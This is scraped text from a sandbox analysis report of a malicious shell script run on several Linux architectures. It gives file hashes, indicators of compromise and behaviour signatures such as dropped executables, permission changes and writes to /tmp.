Analysis
-
max time kernel
150s -
max time network
154s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
28/10/2024, 02:11
Static task
static1
Behavioral task
behavioral1
Sample
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
-
Size
10KB
-
MD5
494b961d2cc6cd624a738d892314cce5
-
SHA1
2052b079fe79da190c6459c627a8c44003ae1f58
-
SHA256
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a
-
SHA512
801d76a32d0790a02cd3d7cd93041c371e44ee9240e240edbb3ecc9fe52c8c26b5395847509398bfa4a17c7a0064475421114120a7b5a49d167b5015a0149e50
-
SSDEEP
96:0rD7ICJJSVBxqV9VlVAVhVlVAzyqz6JbvQXgQLYE1sw/yqz8zJJSVBhk7V9VlVAQ:6eqXrifnmzheJqSXrifn0f
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 27 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 27 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97